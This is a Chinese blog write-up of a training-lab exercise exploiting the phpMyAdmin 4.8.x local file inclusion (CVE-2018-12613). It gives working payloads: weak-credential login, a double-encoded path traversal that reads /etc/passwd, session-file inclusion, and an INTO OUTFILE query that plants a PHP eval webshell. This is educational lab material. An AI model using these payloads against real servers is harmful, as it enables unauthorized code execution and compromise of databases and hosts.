phpmyadmin后台文件包含漏洞分析

前言

在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到(sql注入)和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
 

介绍

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成文件包含漏洞。

在phpMyadmin 4.8.x版本中,程序没有严格控制用户的输入,攻击者可以利用双重编码绕过程序的白名单限制,造成 本地文件包含漏洞。

过程

登录后台

 直接弱口令登录进入后台: root/root

index.php文件包含漏洞利用       

①首先访问以下路径(原理:传送门

http://124.70.71.251:43786/index.php?target=db_sql.php%3f/../../../../../../../../etc/passwd 

出现以下,说明成功利用文件包含漏洞。

使用Session文件包含漏洞来getshell                                                         

①sql写入session文件

 将<?php phpinfo(); ?>命令写入session文件中,以用来下面进行session文件包含(里面执行的操作,会被记录到这个文件内

②获取session id 

查找session id 值 =cookie中的phpmyadimin的值

即为  0arnca8p0kr5834q42gq9dv45fthdl6e。

此时就可以知道Session的文件名为sees_0arnca8p0kr5834q42gq9dv45fthdl6e.

这样文件包含漏洞就可以进行利用了:UNIX系统中存放路径为/tmp/sess_session id

访问session文件

/index.php?target=db_sql.php%253f/../../../../../../tmp/sess_0arnca8p0kr5834q42gq9dv45fthdl6e

获取网页当前的绝对路径

路径为/var/www/html/

③上传php木马

执行sql语句,上传一句话木马

select '<?php @eval($_POST[cmd])?> 呜呜呜我太厉害了 ' into outfile '/var/www/html/1.php'

访问一下1.php(这个时候php代码已经执行啦,直接用蚁剑来连接)

key.txt在根目录下

还有一个小疑点(代码审计)没有搞懂,搞懂了再回来补。

文章参考:https://blog.csdn.net/weixin_39190897/article/details/99078864

phpMyAdmin 4.8.x(最新版) 本地文件包含漏洞利用 - 云+社区 - 腾讯云 (tencent.com)

phpmyadmin文件包含漏洞复现(CVE-2018-12613)_bfengj的博客-CSDN博客_phpmyadmin漏洞

  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值